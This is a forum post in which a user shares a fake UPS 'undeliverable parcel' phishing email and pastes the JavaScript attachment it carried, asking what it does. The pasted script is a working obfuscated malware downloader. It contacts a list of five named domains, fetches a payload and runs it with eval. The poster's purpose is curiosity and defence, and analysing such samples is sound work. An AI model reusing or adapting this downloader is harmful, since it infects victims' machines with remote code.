I received an email at my work email address that had an attachment. The body looked exactly like this (without the quotes):
“Dear Customer,
We can not deliver your parcel arrived at July 06.
Please check the attachment for details!
Thanks and best regards,
,
UPS Senior Office Manager.”
Now, it’s obviously not a legitimate email from UPS but I was curious what was in the attachment. It was a zip file containing a JavaScript file that was named “UPS-Package-2417924.doc” (the .doc was part of the filename, not the extension). I assume the “.doc” portion was to try to trick me into thinking it was a Word file so that I would open it.
I’m obviously not going to run this file but I don’t really know much about JavaScript, so I was just curious what this file would’ve done. Here is the code that was in the file:
[CODE]function nomusta(prototu){return prototu.replace(/AA/g,””);}
var zemk = ‘0000001FELhCxJErs1gdVzVBfoPJyaY9fasQovu502397400MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA8Ffp5P7h-_sedxegmVG2HmyNEfZORvOa_FkQShvtOcXD9X9lBgG_Nivk7FWsAVxubHDD5tiwaMl7focgZZ9pSiKN7mA9RFlVmMKjAOCEk0ST5YWBByM0lNCD2sOPMfwDJrhjq9v99mB7Ur0rU6wyI1pClZQWNPfVdQYusKQ6UXp4bWql2HAKH34d2sPrn1cRKrUT3bF0wlo45EKouEzU7bNghbUahhwxRtLKDNLFqVDhOtz-A-CPpq3A34xZHZGkdKVImClOCUk3waXVDZMy4-xME6rQHqgaqMjU2xHin4YMC3xdaFiftzog61JIkg2xuB0mJXfZRHVAd2xUdqQgIQIDAQABLZQA8ZMqYFppY6hfDTF-fbo-4YntQ1d6ffAJaPSXGzXegX2bJyVvSmnEpSpWezH8__PnNoU8WeZndhNl0’;
var ruxk = ‘208f9056fa4a82dd53ca03b3e2468c8f’;
var kiron = 0;
var x = [“expert5.ru”,”serdcezemli.ru”,”blog.3yinaudio.com”,”infosoft.pl”,”bennuakar.com”];
var jacob = new Array(‘RESPAN’, ‘GET’, ‘MUSIDO’, ”);
var mustafa = x.length+0;
function zulum(pikue) {pikue.send();}
function malysh() {return nomusta(“htAAtAAp”);}
function rizma(kjg, lki) { return kjg.split(lki);}
function greezno() {return nomusta(‘counAAter’);}
function hust(gulibator){eval(gulibator);}
function kidok(heruim){return heruim.responseText;}
while(true)
{
if(kiron>=mustafa)
{
break;
}
try
{
var fuka = new ActiveXObject(nomusta(“MSXAAML2.XMLHTAATP”));
var ghyt = !true;
var gerlk = x[kiron];
fuka.open(jacob[3-2], “”+malysh()+”://”+gerlk+’/’+greezno()+’?’+zemk, ghyt);
zulum(fuka);
var gt = kidok(fuka);
var kimmich = gt.length;
var miffka = gt.indexOf(ruxk);
var miluoki = “a”+””;
if ((kimmich+0) > (8+1+1) * 100 && 2 == 2 && miffka + 3 > 2)
{
var gusar = rizma(gt, ruxk).join(miluoki);
hust(gusar);
break;
}
}
catch(e)
{
};
kiron++;
};
Can anyone tell me what this file was designed to do? Like I said, I’m not going to run it. I’m just curious what this person was trying to do. Any help is much appreciated. Thanks!